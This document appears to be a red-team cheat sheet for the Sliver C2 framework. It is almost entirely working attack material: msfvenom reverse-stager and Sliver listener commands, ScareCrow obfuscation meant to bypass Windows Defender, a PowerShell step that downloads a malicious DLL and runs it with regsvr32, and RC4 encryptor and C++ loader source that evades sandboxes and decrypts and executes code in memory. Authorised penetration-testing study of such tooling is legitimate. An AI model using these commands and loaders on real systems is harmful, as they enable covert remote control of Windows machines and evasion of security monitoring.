# Sliver C2

## Install all post-exploitation tools

```bash
# Install every package the Sliver armory offers (the "all post-exploitation tools" of the heading).
armory install all
```

## Bypass Windows Defender

1. Generate shellcode with msfvenom.

```bash
# Raw x64 reverse_winhttp stager; LHOST/LPORT match the Sliver stage-listener configured below (10.10.14.13:9001).
msfvenom -p windows/x64/custom/reverse_winhttp LHOST=10.10.14.13 LPORT=9001 LURI=/hello.woff -f raw -o shellcode.bin
```

2. Download and build ScareCrow (requires Golang).

```bash
# Build ScareCrow from source; `go build .` needs a Go toolchain on PATH.
git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow
go build .
```

3. Obfuscate the shellcode with ScareCrow.

```bash
# Wrap shellcode.bin in ScareCrow's DLL loader; -nosign presumably skips the code-signing step (per the flag name — confirm in ScareCrow's help).
./ScareCrow -I shellcode.bin -Loader dll -nosign
```

4. Set up Sliver C2.

```bash
# Beacon profile "qu35t": windows/amd64, mTLS back to 10.10.14.13:9000, emitted as shellcode.
profiles new beacon --arch amd64 --os windows --mtls 10.10.14.13:9000 -f shellcode --evasion --timeout 300 --seconds 5 --jitter 1 qu35t
# HTTP stage listener on :9001 serving the qu35t profile — the port the msfvenom stager above calls back to.
stage-listener --url http://10.10.14.13:9001 --profile qu35t --prepend-size
# mTLS listener the beacon itself connects to (must match --mtls in the profile).
mtls --lhost 10.10.14.13 --lport 9000
```

<figure><img src="/files/FzF8c0cJ1g1hqN9dPYhi" alt=""><figcaption><p>Windows Defender Status<br></p></figcaption></figure>

5. Upload and execute your malicious DLL on the target machine.

```powershell
# Fetch the loader DLL over plain HTTP into C:\Temp, then load it with regsvr32.
mkdir C:/Temp/
cd C:/Temp/
(New-Object Net.WebClient).DownloadFile('http://10.10.14.13/qu35t.dll','C:\Temp\qu35t.dll')
# WebClient download into a Temp directory followed by a regsvr32 load is a widely monitored sequence.
regsvr32.exe .\qu35t.dll, DLLRegisterServer
```

<figure><img src="/files/GZAM4Vwm98X4YJUNZmyV" alt=""><figcaption></figcaption></figure>

```python
import sys

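def rc4(data, key):
    """Transform ``data`` with RC4 under ``key`` (RC4 is symmetric: encrypt == decrypt).

    Args:
        data: bytes-like object to transform.
        key: non-empty bytes-like key; it is indexed byte-wise.

    Returns:
        A new ``bytearray`` holding ``data`` XOR-ed with the RC4 keystream.

    Raises:
        ValueError: if ``key`` is empty (previously this surfaced as a
            ZeroDivisionError from ``i % keylen``).

    RC4 is a cryptographically broken stream cipher: treat this as an
    obfuscation layer, not as confidentiality.
    """
    keylen = len(key)
    if keylen == 0:
        raise ValueError("rc4 key must not be empty")

    # Key-scheduling algorithm (KSA): permute the identity table with the key.
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % keylen]) % 256
        s[i], s[j] = s[j], s[i]

    # Pseudo-random generation algorithm (PRGA): one keystream byte per input byte.
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])

    return out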
    
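if __name__ == "__main__":
    # CLI: rc4.py <key> <filename> — reads the file, RC4-transforms it and writes the result.
    if len(sys.argv) != 3:
        print("Usage: ./rc4.py <key> <filename>")
        sys.exit(1)  # usage error: exit non-zero so calling scripts notice (was exit(0))

    key = sys.argv[1]
    filename = sys.argv[2]

    with open(filename, 'rb') as f:
        data = f.read()

    # rc4() indexes the key byte-wise, so the CLI string is encoded to bytes first.
    encrypted = rc4(data, key.encode())

    with open(f"(unknown).enc", 'wb') as f:
        f.write(encrypted)

    print(f"Written (unknown).enc")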
```

```cpp
#include <stdio.h>
#include <Windows.h>
#include <chrono>
#include <thread>

#define _CRT_SECURE_NO_DEPRECATE
#pragma warning (disable : 4996)

extern "C" void RunData();

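// In-place RC4 of `len` bytes at `data` under the NUL-terminated `key`
// (RC4 is symmetric, so the same call encrypts and decrypts).
//
// Preconditions: `data` points to at least `len` writable bytes. The call is
// a no-op for a null `data`, a non-positive `len`, or a null/empty `key`;
// the previous version divided by zero (`i % keylen`) on an empty key.
//
// RC4 is a cryptographically broken stream cipher: this is an obfuscation
// layer, not confidentiality.
void rc4(unsigned char* data, int len, const char* key) {
    if (data == nullptr || len <= 0 || key == nullptr) {
        return;
    }
    const size_t keylen = strlen(key);
    if (keylen == 0) {
        return;
    }

    // Key-scheduling algorithm (KSA): permute the identity table with the key.
    unsigned char s[256];
    for (int i = 0; i < 256; i++) {
        s[i] = static_cast<unsigned char>(i);
    }
    unsigned char j = 0;
    for (int i = 0; i < 256; i++) {
        // Widen the key byte as unsigned so the sum never goes negative;
        // modulo 256 the value is identical, it just avoids signed-char surprises.
        const unsigned char kb = static_cast<unsigned char>(key[i % keylen]);
        j = static_cast<unsigned char>(j + s[i] + kb);
        const unsigned char tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
    }

    // Pseudo-random generation algorithm (PRGA): XOR each byte with one
    // keystream byte. Both indices are unsigned char, so wrap-around replaces
    // the explicit `% 256`.
    unsigned char i = 0;
    j = 0;
    for (int n = 0; n < len; n++) {
        i = static_cast<unsigned char>(i + 1);
        j = static_cast<unsigned char>(j + s[i]);
        const unsigned char tmp = s[i];
        s[i] = s[j];
        s[j] = tmp;
        data[n] ^= s[static_cast<unsigned char>(s[i] + s[j])];
    }
}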

// Entry point: sleeps, checks the wall clock, then RC4-decrypts the code at
// the RunData symbol in place and calls it. argc/argv are unused; there is no
// return statement, so main implicitly returns 0 if RunData() returns.
int main(int argc, char** argv) {
    // Exits if fewer than 4.5 s of wall-clock time passed during a 5 s sleep.
    // A sleep-then-compare of this shape is itself a common analysis heuristic.
    auto start = std::chrono::system_clock::now();
    std::this_thread::sleep_for(std::chrono::seconds(5));
    auto end = std::chrono::system_clock::now();
    std::chrono::duration<double> elapsed_seconds = end - start;
    if (elapsed_seconds.count() < 4.5) {
        exit(0);
    }
    // Hard-coded key and length. len is assumed to equal the size of the
    // encrypted region starting at RunData — nothing here verifies that.
    const char* key = "advapi32.dll";
    int len = 2121221;
    DWORD oldProtect = 0;
    // Makes the region RWX so it can be decrypted in place; a PAGE_EXECUTE_READWRITE
    // change on a module's own code is a strong memory-protection telemetry signal.
    // On failure only the error is printed and execution falls through to rc4(),
    // which then writes to memory still under the old protection.
    // Note: GetLastError() returns a DWORD, so "%d" is a format mismatch ("%lu").
    if (!VirtualProtect((LPVOID)&RunData, len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        printf("Error: %d", GetLastError());
    }
    rc4((unsigned char*)&RunData, len, key);
    // Restore the previous protection (oldProtect is overwritten with the RWX value here).
    VirtualProtect((LPVOID)&RunData, len, oldProtect, &oldProtect);
    RunData();
}
```

